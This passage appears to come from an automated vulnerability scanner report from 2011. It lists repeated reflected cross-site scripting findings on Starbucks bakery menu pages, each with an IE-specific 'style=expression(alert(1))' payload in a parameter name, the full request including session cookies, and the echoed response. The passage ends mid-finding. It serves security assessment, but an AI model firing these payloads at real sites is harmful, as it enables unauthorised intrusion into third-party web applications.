This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/apple-bran-muffin?b49f2"style%3d"x%3aexpression(alert(1))"d39bf9c38f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:47:38 GMT Connection: close Content-Length: 44399
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/apple-bran-muffin?b49f2"style="x:expression(alert(1))"d39bf9c38f=1"/> ...[SNIP]...
1.817. http://www.starbucks.com/menu/food/bakery/apple-fritter [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/apple-fritter
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31dd9"style%3d"x%3aexpression(alert(1))"86ccc93fdb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 31dd9"style="x:expression(alert(1))"86ccc93fdb0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/apple-fritter?31dd9"style%3d"x%3aexpression(alert(1))"86ccc93fdb0=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:46:02 GMT Connection: close Content-Length: 44539
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/apple-fritter?31dd9"style="x:expression(alert(1))"86ccc93fdb0=1"/> ...[SNIP]...
1.818. http://www.starbucks.com/menu/food/bakery/asiago-bagel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/asiago-bagel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2958"style%3d"x%3aexpression(alert(1))"253fd2ac0e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e2958"style="x:expression(alert(1))"253fd2ac0e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/asiago-bagel?e2958"style%3d"x%3aexpression(alert(1))"253fd2ac0e8=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:46:43 GMT Connection: close Content-Length: 44137
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/asiago-bagel?e2958"style="x:expression(alert(1))"253fd2ac0e8=1"/> ...[SNIP]...
1.819. http://www.starbucks.com/menu/food/bakery/banana-nut-loaf [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/banana-nut-loaf
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 608e6"style%3d"x%3aexpression(alert(1))"50409be2fad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 608e6"style="x:expression(alert(1))"50409be2fad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/banana-nut-loaf?608e6"style%3d"x%3aexpression(alert(1))"50409be2fad=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:47:13 GMT Connection: close Content-Length: 42886
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/banana-nut-loaf?608e6"style="x:expression(alert(1))"50409be2fad=1"/> ...[SNIP]...
1.820. http://www.starbucks.com/menu/food/bakery/birthday-cake-mini-doughnut [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/birthday-cake-mini-doughnut
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36b15"style%3d"x%3aexpression(alert(1))"625aeb76d3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 36b15"style="x:expression(alert(1))"625aeb76d3a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/birthday-cake-mini-doughnut?36b15"style%3d"x%3aexpression(alert(1))"625aeb76d3a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:48:32 GMT Connection: close Content-Length: 43794
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/birthday-cake-mini-doughnut?36b15"style="x:expression(alert(1))"625aeb76d3a=1"/> ...[SNIP]...
1.821. http://www.starbucks.com/menu/food/bakery/blueberry-oat-bar [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/blueberry-oat-bar
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d769"style%3d"x%3aexpression(alert(1))"3750d0b57de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d769"style="x:expression(alert(1))"3750d0b57de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/blueberry-oat-bar?8d769"style%3d"x%3aexpression(alert(1))"3750d0b57de=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:48:08 GMT Connection: close Content-Length: 43568
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/blueberry-oat-bar?8d769"style="x:expression(alert(1))"3750d0b57de=1"/> ...[SNIP]...
1.822. http://www.starbucks.com/menu/food/bakery/blueberry-scone [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/blueberry-scone
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7708"style%3d"x%3aexpression(alert(1))"023b71db86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7708"style="x:expression(alert(1))"023b71db86f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/blueberry-scone?d7708"style%3d"x%3aexpression(alert(1))"023b71db86f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:48:53 GMT Connection: close Content-Length: 43585
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/blueberry-scone?d7708"style="x:expression(alert(1))"023b71db86f=1"/> ...[SNIP]...
1.823. http://www.starbucks.com/menu/food/bakery/blueberry-streusel-muffin [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/blueberry-streusel-muffin
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4f8c"style%3d"x%3aexpression(alert(1))"3533e46b66c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a4f8c"style="x:expression(alert(1))"3533e46b66c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/blueberry-streusel-muffin?a4f8c"style%3d"x%3aexpression(alert(1))"3533e46b66c=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:49:03 GMT Connection: close Content-Length: 43829
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/blueberry-streusel-muffin?a4f8c"style="x:expression(alert(1))"3533e46b66c=1"/> ...[SNIP]...
1.824. http://www.starbucks.com/menu/food/bakery/butter-croissant [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/butter-croissant
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61c60"style%3d"x%3aexpression(alert(1))"78f4d5b41a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61c60"style="x:expression(alert(1))"78f4d5b41a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/butter-croissant?61c60"style%3d"x%3aexpression(alert(1))"78f4d5b41a5=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:51:07 GMT Connection: close Content-Length: 43459
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/butter-croissant?61c60"style="x:expression(alert(1))"78f4d5b41a5=1"/> ...[SNIP]...
1.825. http://www.starbucks.com/menu/food/bakery/cheese-danish [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/cheese-danish
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 720d9"style%3d"x%3aexpression(alert(1))"e96e6a310b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 720d9"style="x:expression(alert(1))"e96e6a310b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/cheese-danish?720d9"style%3d"x%3aexpression(alert(1))"e96e6a310b9=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:50:28 GMT Connection: close Content-Length: 43530
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cheese-danish?720d9"style="x:expression(alert(1))"e96e6a310b9=1"/> ...[SNIP]...
1.826. http://www.starbucks.com/menu/food/bakery/chocolate-chunk-cookie [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/chocolate-chunk-cookie
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3ae7"style%3d"x%3aexpression(alert(1))"1218e3ddc34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3ae7"style="x:expression(alert(1))"1218e3ddc34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/chocolate-chunk-cookie?b3ae7"style%3d"x%3aexpression(alert(1))"1218e3ddc34=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:50:28 GMT Connection: close Content-Length: 43745
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/chocolate-chunk-cookie?b3ae7"style="x:expression(alert(1))"1218e3ddc34=1"/> ...[SNIP]...
1.827. http://www.starbucks.com/menu/food/bakery/chocolate-croissant [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/chocolate-croissant
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec6af"style%3d"x%3aexpression(alert(1))"7f2ab7e4792 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec6af"style="x:expression(alert(1))"7f2ab7e4792 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/chocolate-croissant?ec6af"style%3d"x%3aexpression(alert(1))"7f2ab7e4792=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:50:24 GMT Connection: close Content-Length: 43723
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/chocolate-croissant?ec6af"style="x:expression(alert(1))"7f2ab7e4792=1"/> ...[SNIP]...
1.828. http://www.starbucks.com/menu/food/bakery/chocolate-old-fashion-doughnut [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/chocolate-old-fashion-doughnut
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8e17"style%3d"x%3aexpression(alert(1))"09e01d0c9ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8e17"style="x:expression(alert(1))"09e01d0c9ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/chocolate-old-fashion-doughnut?e8e17"style%3d"x%3aexpression(alert(1))"09e01d0c9ea=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:50:23 GMT Connection: close Content-Length: 44023
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/chocolate-old-fashion-doughnut?e8e17"style="x:expression(alert(1))"09e01d0c9ea=1"/> ...[SNIP]...
1.829. http://www.starbucks.com/menu/food/bakery/chonga-bagel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/chonga-bagel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a9de"style%3d"x%3aexpression(alert(1))"4d4ab94d51c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a9de"style="x:expression(alert(1))"4d4ab94d51c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/chonga-bagel?9a9de"style%3d"x%3aexpression(alert(1))"4d4ab94d51c=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:51:59 GMT Connection: close Content-Length: 44374
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/chonga-bagel?9a9de"style="x:expression(alert(1))"4d4ab94d51c=1"/> ...[SNIP]...
1.830. http://www.starbucks.com/menu/food/bakery/cinnamon-chip-scone [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/cinnamon-chip-scone
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9357"style%3d"x%3aexpression(alert(1))"a5e7a229ce8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9357"style="x:expression(alert(1))"a5e7a229ce8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
